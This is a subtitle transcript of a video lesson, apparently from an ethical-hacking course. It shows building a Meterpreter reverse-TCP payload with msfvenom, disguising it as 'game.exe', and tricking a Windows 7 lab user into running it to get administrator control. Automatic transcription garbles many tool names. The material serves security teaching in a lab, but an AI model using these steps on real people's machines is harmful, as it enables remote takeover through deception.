1
00:00:01,010 --> 00:00:07,130
All right, and the previous lesson, we installed the box guest additions, so that would be able to

2
00:00:07,130 --> 00:00:09,490
copy and paste easily, that's going to be pretty important.

3
00:00:09,500 --> 00:00:14,720
It sounds like a small thing, but it'll save a lot of writing things down and retyping them.

4
00:00:15,110 --> 00:00:20,840
When we hack from Alcalay Linux box into a Windows seven, we saw that Windows seven is on almost half

5
00:00:20,840 --> 00:00:22,250
of the desktops worldwide.

6
00:00:22,250 --> 00:00:29,570
Still, even though we're two versions away from that currently and we're going to use Métis spoilt

7
00:00:29,570 --> 00:00:35,240
the framework that comes with Alcalay Linux set up so that we can hack into that Windows seven computer

8
00:00:35,690 --> 00:00:44,100
using one of the most powerful frameworks for system vulnerability testing and penetration testing metastable.

9
00:00:44,810 --> 00:00:47,240
So first of all, we've got both of our machines open.

10
00:00:47,550 --> 00:00:50,840
I'm going to go to full screen for Calli, so that should be able to see this better.

11
00:00:51,320 --> 00:00:53,840
And we're going to start the Métis framework.

12
00:00:53,840 --> 00:01:00,890
You can find that here on the left hand bar or you can come under applications, exploitation tools,

13
00:01:01,070 --> 00:01:06,610
Métis, Boit, either one of those will open it up and I'm going to open a second terminal window.

14
00:01:06,620 --> 00:01:08,210
You notice that this is terminal driven.

15
00:01:09,810 --> 00:01:18,600
I'm going to start the PostgreSQL Oil Rescue El Postgrads or PostgreSQL of databased service so that

16
00:01:18,600 --> 00:01:20,250
we can search things really quickly.

17
00:01:20,760 --> 00:01:27,540
So we'll say service post rescue will start.

18
00:01:29,440 --> 00:01:31,000
We've got our database up and running.

19
00:01:32,310 --> 00:01:34,830
And just as a reality check, I have config.

20
00:01:36,370 --> 00:01:42,040
It tells us that we are on Tenga three to five, your address may be slightly different if you started

21
00:01:42,040 --> 00:01:46,390
your Windows box after your Cauli Linux box on this private network, you may have picked up a different

22
00:01:46,390 --> 00:01:46,990
address.

23
00:01:47,320 --> 00:01:49,030
I am Tenggara three to five.

24
00:01:49,030 --> 00:01:53,010
That's going to be very important for a lot of our exploits here.

25
00:01:53,620 --> 00:01:59,830
So the first thing we've done is run our Medda split console and this is MSF, the meta split framework

26
00:01:59,830 --> 00:02:00,400
console.

27
00:02:00,400 --> 00:02:04,150
And you can see that I have a prompt down here for MSF.

28
00:02:04,720 --> 00:02:07,240
I'm going to start Ms.

29
00:02:07,240 --> 00:02:12,220
Venom, and I'm going to create a payload that's going to be an executable file that I'll be able to

30
00:02:12,220 --> 00:02:15,610
run from my Windows computer.

31
00:02:15,910 --> 00:02:20,140
And I'm going to serve that up on a Web server on this Calli Linux box.

32
00:02:20,710 --> 00:02:26,710
This is this is somewhat similar to whom we use the social engineering tool kit back in Section five

33
00:02:26,710 --> 00:02:34,090
to fool someone into downloading a fool, someone into entering their user credentials into a fake Facebook

34
00:02:34,090 --> 00:02:34,480
page.

35
00:02:34,660 --> 00:02:38,920
We're going to fool someone into downloading something that looks like a game but actually gives us

36
00:02:38,920 --> 00:02:42,000
a back door and to control their computer as an administrator.

37
00:02:42,490 --> 00:02:46,360
So the command that we want to run is MSF Venom.

38
00:02:47,440 --> 00:02:49,330
And you'll see why this is named Venom.

39
00:02:49,330 --> 00:02:54,730
Once we use it next time, I'm going to make that a little bigger and clear the screen.

40
00:02:57,590 --> 00:02:58,520
Now, Ms.

41
00:02:58,520 --> 00:02:59,840
F then.

42
00:03:02,920 --> 00:03:11,230
And we want to specify a payload that we're going to deliver to our Windows seven box, and that payload

43
00:03:11,230 --> 00:03:14,380
is going to be a very powerful tool called letterpress.

44
00:03:14,450 --> 00:03:20,650
Our interpreter comes with a display framework and it allows us to set up an interpreter or a running

45
00:03:20,650 --> 00:03:26,050
shell that lets us communicate to that Windows seven box and we'll be able to eventually take it over

46
00:03:26,050 --> 00:03:26,970
as an administrator.

47
00:03:27,670 --> 00:03:37,660
So our MSF venom gets followed by Kaspi for payload windows, windows slash interpretor.

48
00:03:41,420 --> 00:03:49,370
Reverse underscore TCAP, that's going to establish a reverse TCP connection, in other words, the

49
00:03:49,370 --> 00:03:51,580
Windows seven months is going to call us.

50
00:03:51,590 --> 00:03:59,960
It's going to call the Cauli Linux machine using TCP or the transmission control protocol, just the

51
00:04:00,260 --> 00:04:03,990
regular TCP IP that the worldwide web uses to communicate.

52
00:04:04,280 --> 00:04:08,880
So we're going to establish a connection from that Windows seven bucks back to our Linux box.

53
00:04:09,170 --> 00:04:12,590
Well, we need to tell it the host address of the Calli Linux box.

54
00:04:13,010 --> 00:04:20,360
So we'll say, well, host equals and we need that IP address 10 DataDot three point five so we can

55
00:04:20,360 --> 00:04:21,080
even copy it.

56
00:04:22,830 --> 00:04:28,650
Come up here and paste that way, we make sure we get it exactly right, minus 10, Agota three point

57
00:04:28,650 --> 00:04:31,550
five, make sure you match whatever your I-F config says.

58
00:04:32,190 --> 00:04:40,080
Next, we tell the format that we want to export this payload and that is going to be Dasch F and it's

59
00:04:40,080 --> 00:04:46,710
going to be in the XP file or an executable file for Windows F space.

60
00:04:46,710 --> 00:04:53,100
EXI this is going to wrap a line, but you can see how it works there and now we need to tell it the

61
00:04:53,310 --> 00:04:57,160
name of the file and where we want to store that as an output file.

62
00:04:57,480 --> 00:05:03,690
So this is going to create a payload or an executable file that we're going to run on our Windows seven

63
00:05:03,690 --> 00:05:09,240
computer and I'll put that to slash root slash desktop.

64
00:05:12,650 --> 00:05:16,670
Slash and let's call it game got XY.

65
00:05:17,800 --> 00:05:24,640
So this is going to look like a game that we're tricking someone into downloading and running on their

66
00:05:24,640 --> 00:05:32,920
Windows seven computer, once you run that, if you've put the output location as route desktop gamed

67
00:05:32,920 --> 00:05:39,610
out XY, if we pull this down now, we see game XY is here on the Callisthenics desktop.

68
00:05:39,620 --> 00:05:47,800
So this has created a Windows executable notice and X 86 Windows platform executable.

69
00:05:48,280 --> 00:05:53,010
That's an executable format or XY format called Gained XY.

70
00:05:53,470 --> 00:05:57,670
So we have our payload ready to go in the next lesson.

71
00:05:57,670 --> 00:06:04,450
We're going to see how to put this up on a temporary Web page that we're going to set up on this Calli

72
00:06:04,450 --> 00:06:08,930
Linux box so that we can exploit it and run it on our Windows seven computer.

73
00:06:09,340 --> 00:06:14,230
We'll see how to set up the Exploit Web site in the next lesson.